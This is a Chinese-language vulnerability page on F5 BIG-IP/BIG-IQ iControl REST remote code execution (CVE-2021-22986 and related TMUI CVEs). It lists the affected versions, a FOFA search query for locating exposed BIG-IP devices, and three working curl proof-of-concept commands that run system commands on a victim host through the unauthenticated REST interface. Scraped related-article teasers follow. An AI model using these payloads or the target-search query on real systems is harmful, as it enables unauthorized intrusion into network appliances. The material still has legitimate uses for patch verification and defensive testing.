F5 BIG-IP iControl RCE (CVE-2021-22986)
漏洞描述
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。
1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。
2、CVE-2021-22987 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。
3、CVE-2021-22988 BIG-IP TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令。
4、CVE-2021-22989 Advanced WAF/ASM TMUI 后台远程代码执行漏洞 中,经过身份验证的用户通可构造恶意请求,执行任意系统命令。
5、CVE-2021-22990 Advanced WAF/ASM TMUI 后台远程代码执行漏洞 中,经过身份验证的用户可构造恶意请求,执行任意系统命令
影响版本
CVE-2021-22986 影响版本:
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990 影响版本:
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 11.6.1-11.6.5.2
fofa查询
(server="BigIP" || title="BIG-IP®- Redirect") && server!="Jboss"
POC
1
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
2
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"id"}'
3
curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
F5 BIG-IP iControl RCE (CVE-2021-22986)相关推荐
- 连接 F5 大 IP 设备
重要 Azure Sentinel 中的 F5 大 IP 数据连接器目前为公共预览版. 此功能在提供时没有服务级别协议,不建议用于生产工作负荷. 某些功能可能不受支持或者受限. 有关详细信息,请参阅 ...
- 在F5 BIG IP版本9中生成CSR文件的教程
在申请SSL证书时,申请者必须为您的 Web 服务器上的域名或主机名创建证书签名请求 (CSR).CSR是向证书颁发机构 (CA) 发送您的公钥的标准化方式,该公钥与服务器上的秘密私钥配对,并提供有关 ...
- 广播IP转型报告:2021年广播公司面临的最大挑战
正文字数:1559 阅读时长:5分钟 文 / Lina Nikols 译 / LiveVideoStack 原文链接 / https://www.haivision.com/blog/broadcas ...
- 2021年中国IP改编移动游戏市场收入达1297.7亿元,同比增长4.38%[图]
近年来中国IP改编移动游戏市场收入快速增长,2021年中国IP改编移动游戏市场收入达1297.7亿元,较2020年增加了54.50亿元,同比增长4.38%. 2018-2021年中国IP改编移动游戏市 ...
- 热门开源后端软件Parse Server中存在严重的 RCE ,CVSS评分10分
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件的安全 ...
- Python F5创建monitor、pool、node以及vs(二)
一.环境依赖 对f5进行操作,我们需要下载f5-sdk的依赖包. f5-sdk==3.0.21 urllib3==1.25.7 # 安装命令: pip install f5-sdk==3.0.21 u ...
- 全球高级持续性威胁 APT 2021年度报告
声明 本文是学习全球高级持续性威胁 APT 2021年度报告. 而整理的学习笔记,分享出来希望更多人受益,如果存在侵权请及时联系我们 中国境内高级持续性威胁综述 基于中国境内海量DNS域名解析和奇安信 ...
- WebLogic CVE-2021-2394 RCE 漏洞分析
漏洞简述 2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息. 这是一个二次反序列化漏洞,是 ...
- “泡泡玛特乐园”,难逃IP大考
文|螳螂观察 作者|图霖 1928年,迪士尼推出了电影史上第一部有声动画<汽船威利号>.影片里,有着圆滚滚大脑袋和大耳朵的米奇,吹着口哨开着船,既可爱又诙谐.影片播出后,米奇一炮而红. 这 ...
最新文章
- Node.js express 之mongoose 从异步回调函数返回值,类似于同步
- linux(Ubuntu)查看环境变量指向的路径
- setcellvalue 格式_POI对EXCEL的操作【重点:如何设置CELL格式为文本格式】
- wider face data 在 faster rcnn 上的实践记录(caffe)
- 《大话数据结构》读后总结(六)
- 通向架构师的道路(第十一天)之Axis2 Web Service(二)
- c4d如何把文字贴在物体表面_一篇文章带你了解C4D布光技巧
- 60-10-050-命令-kafka-broker-api-versions.sh
- Echarts数据可视化title标题,开发全解+完美注释
- 网易编程题-操作序列
- 阿里云短信接口方法使用
- 74HC573芯片简介
- 大鱼吃小鱼小游戏(Java版代码,JavaSwing+多线程+接口)
- 问卷中多选题该怎么分析?
- 【网络安全】应用实践题(无答案)
- Android适配阿拉伯语、波斯语语系
- apicloud命名空间$api方法集合
- idea去掉不想commit的文件
- 星际译王 stardict 3.0.6 -- Linux 下的优秀词典软件在 Debian 上的一键安装
- 影院购票系统座位信息锁定问题